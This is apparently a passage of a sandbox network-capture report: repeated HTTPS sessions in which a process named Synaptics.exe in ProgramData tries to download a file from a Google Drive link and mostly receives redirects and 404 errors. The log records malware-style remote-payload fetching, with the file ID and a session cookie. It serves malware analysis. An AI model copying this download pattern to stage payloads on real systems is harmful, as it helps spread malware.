2024-12-30 10:49:20 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="TeR7wbBEVS7_WSSRLhWJdA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:49:20 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.8 | 49779 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:20 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:20 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:20 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Dvu04cJiIlbMJmMzlSgGfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.8 | 49780 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:20 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:20 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:20 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-oaNRYPcqvnyVEgAwaEs_zQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.8 | 49781 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:20 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:20 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC56cKeQm4BOcXEY4uZL58k4wMgbKVPNtAYUaqP45QFbEGoU7PQ7JyPSLEXpu3yUEinhTj3qh5g
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:20 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-T31ncOEkBRHxaV7vhxfjuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:20 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:49:20 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="ZkTnaHvaR3wSaInqlHR0pw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:49:20 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.8 | 49785 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:21 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:21 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7t4IjvbaMkTWaJc_jn8pG3XhnnjStaLLV_yWRIynjVbHCQEhAaohIlN7PC6q_WoGgU
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:21 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-0zrqcvvWIOCk9LBLBlO8Xg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:21 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:49:21 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="DOnb2JQpJZOK4zbXrmP2YA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:49:21 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.8 | 49783 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:21 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:21 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:21 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-dmgQc-1DXBnw4Vb3jHUvjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.8 | 49782 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:21 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:21 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:21 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-KUycKH5UV62urxVps6-26A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.8 | 49784 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:21 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:21 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6C_HpLn0ifJlg5HdiyY8OGu-Dna7QaV_QXzTjNm-8XM8aiF1ZKxEIVV2WXnLdiIA73
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:21 GMT
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-f3QdbNMcWNKHGrz8nEYfiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:21 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:49:21 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="0KacuQt1SdjhTGWoRPy7Xw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:49:21 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.8 | 49788 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:22 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.8 | 49789 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:22 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.8 | 49787 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:22 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.8 | 49790 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:22 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.8 | 49794 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:23 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:23 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:23 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-NcC3_rU8CgYRNu-6x9mdgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.8 | 49795 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:23 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
